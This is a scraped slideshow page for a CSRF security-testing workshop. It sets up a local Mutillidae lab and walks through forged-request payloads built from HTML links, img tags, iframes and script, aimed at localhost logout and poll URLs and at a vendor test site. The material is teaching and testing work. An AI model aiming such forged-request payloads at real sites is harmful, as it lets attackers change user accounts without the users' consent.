Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Oh no, was that CSRF #Ouch

426 views

Published on

Overview: Are you web developer / Tester / Architect, why don’t you stop sucking you web app against CSRF attacks? Mission :- This session is on detecting and exploiting CSRF / XSRF issues. At the end of this session, the participant will be able manually identify CSRF / XSRF vulnerabilities in web applications. URL :- http://weekendtesting.com/archives/3843 Agenda :- Introduction What is Cross Side Request Forgery CSRF check & How to test (Iron OWASP , CSRF Finders) Prevention of CSRF attacks Q & A Prerequisite knowledge: Basic Technical knowledge about web application

Published in: Technology
  • Be the first to comment

Oh no, was that CSRF #Ouch

  1. 1.   OH NO, WAS THAT  CSRF ? Abhinav Sejpal
  2. 2. WHO AM I I' M new Generation Exploratory Testy Researcher & Reader in free time Spekear at  Facilitator at Weekend Testing Crowd Tester (AKA. Bug bounty Hunter)   Reported Security Vulnerabilities for 50+ unique customers all over the world  inlcluding Apple, yahoo, Outlook, adobe & etc. Proficient at Functional, Usability , Accessibility & Compatibility Testing Love to develop nasty code  & Hack it :) Works as Quality Analyst at AKA. Bug Wrangler Null  & OWASP Co mmunity passbrains.com
  3. 3. ~Publication ~
  4. 4. DISCLAIMER This Presentation is intended for educational purposes only and I cannot be held liable for any kind of damages done whatsoever to your machine, or other damages.   Please - Don't try this attack on any others system without having context knowledge or permission, this may harm to someone directly or indirectly. Feel free to use this presentation for practice or education purpose. ^ I hope - You gotcha ^
  5. 5. SOCIAL MEDIA FEED Hashtag for this session      # ,  #BitzNightTesting CSRF : Twitter handle for feedback :  @   @weekendtesting Abhinav_Sejpal G+  http://goo.gl/kMAOs1
  6. 6. AGENDA Introducation Set up Pen Testing LAB Overview of HTTP Request Intercept the HTTP Request using Proxy (MITM) Understanding cross site attacks Testing for a cross site request forgery risk Attack Anti-forgery Attacks Common Defences Against CSRF
  7. 7. SETUP THE TEST LAB Install XAMPP for:Acronym X (to be read as "cross", meaning )cross-platform Apache HTTP Server MySQL PHP Perl
  8. 8. Why MySQL?  is  Girlfriend of PHP TARGETED APPLICATION Client Side language : HTML & Javascript Server side Language: PHP DB : MYSQL  Why PHP ?  - Any answer Here? MySQL <3 
  9. 9. http://w3techs.com/technologies/overview/programming_lang PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE PROGRAMMING LANGUAGE.
  10. 10. PHP: 244M SITES 2.1M IP ADDRESSES
  11. 11. 2013 Server-side Programming Language of the Year Don't Mind Power of PHP > Facebook & yahoo  http://w3techs.com/blog/entry/web_technologies_of_the_year
  12. 12. It's a free, open source web application provided to allow security enthusiast to pen-test and hack a web application. V.2X developed by  aka PLAY GROUND  MUTILLIDAE Jeremy Druin webpwnized.
  13. 13. ALL SET WITH MULTILLIDAE ?
  14. 14. AM I VULNERABLE TO 'CSRF' ?
  15. 15. OWASP A8 - CSRF CROSS-SITE REQUEST FORGERY
  16. 16. Facebook Post Linkedin Panel
  17. 17. HOW WEB WORKS ?
  18. 18. ' Send Request '
  19. 19. Proxy (Man in the middle) Intercept Request & Respond from client
  20. 20. CSRF ATTACK CYCLE
  21. 21. CSRF AKA. XSRF   THE ATTACKER EXPLOITS THE TRUST A WEBSITE HAS AGAINST A USER’S BROWSER.  Permission fakingstealing  Disruption of the normal sequence of the site
  22. 22. http://127.0.0.1/xampp/mutillidae/index.php?do=logout DEMO #1 Login ID - admin password - adminpass HTTP GET Request
  23. 23. <a href= > : ANSWER  DEMO 1: <html> <title> CSRF Demo 1 </title> http://127.0.0.1/xampp/mutillidae/index.php? do=logout Click me </a> </html>
  24. 24. Yes it's not dangerous but annoying UNDERSTANDING Logout page has a simple HTTP GET that required no confirmation Every user who visited that page would immediately be logged out - that's CSRF in action.
  25. 25. SO WHAT DO YOU THINK, IT'S ALL ABOUT CLICK ? ssh, No!! Would you like to write CSRF exploit without click ??
  26. 26. <img src= > CSRF GET Request with Image Tag <html> <title> CSRF Demo 1 </title> http://127.0.0.1/xampp/mutillidae/index.php? do=logout </html>
  27. 27. HTTP REQUEST <iframe src=" http://127.0.0.1/xampp/mutillidae/index.php? do=logout"></iframe>            <script> var X= new Image();                                                X.src= " http://127.0.0.1/xampp/mutillidae/index.php?do=logout ";                 </script>
  28. 28. CHALLENGE  #1
  29. 29. <html> <title> CSRF Demo 1 </title> <a href = > Click me </a> </html> :: SOLUTION #1 :: http://127.0.0.1/xampp/mutillidae/index.php? page=user-poll.php&csrf- token=&choice=nmap&initials=n&user-poll-php-submit- button=Submit+Vote
  30. 30. DOES IT EASY TO CREATE CSRF HTTP REQUEST ? No - you should try out   IronWASP    CSRF PoC Generator - Tool for automatically generating exploits for CSRF vulnerabilities * One Click POC * * Hybrid automation * thanks a ton to Lava & Jayesh 
  31. 31. { Post HTTP Request } CHALLENGE  #2
  32. 32. CHALLENGE  #3 Add user with out admin knowledge
  33. 33. LIVE CHALLENGE * SIGNUP DISABLED * PLEASE USE THE USERNAME TEST AND THE PASSWORD TEST CSRF & XSRF Update the user info. without their knowledge http://testphp.vulnweb.com/userinfo.php Copyright © 2014, Acunetix Ltd
  34. 34. Can we exploit this with Level #2 ? You've been CSRF'd with static token! 
  35. 35. Lets try with Level - 3
  36. 36. ~ Keep Hacking your Code ~ There is no silver bullet to stop this - Just Trust your code
  37. 37. POPULAR COOL FINDINGS by AmolFacebook CSRF worth USD 5000 GOOGLE GROUPS PROFILE CSRF Google Account display pic deletion Facebook Account deactivation Advance Leanings -  CSRF Token Validation Fail http://haiderm.com/csrf-token-protection-bypass-methods/
  38. 38. INDIAN HACKERS/INFOSEC GUYS & GROUPS YOU SHOULD BE FOLLOWING IN TWITTER Thank-you http://garage4hackers.com/ community
  39. 39. - Twitter Folks -  @  @ , @ , @   CREDITS riyazwalikar TroyHunt yog3sharma makash & @ Big thank You to @  , @  & you All. anatshri weekendtesting srinivasskc
  40. 40. YES - I'M DONE! Feel free to write me at bug.wrangler at outlook.com
  41. 41. LICENSE AND COPYRIGHTS https://slides.com/abhinavsejpal/weekend-testing-csrf copyrights 2013-2014 Abhinav Sejpal -----   ( CC BY-NC-ND 3.0) Attribution-NonCommercial-NoDerivs 3.0 Unported   Dedicated to my lovely daddy

×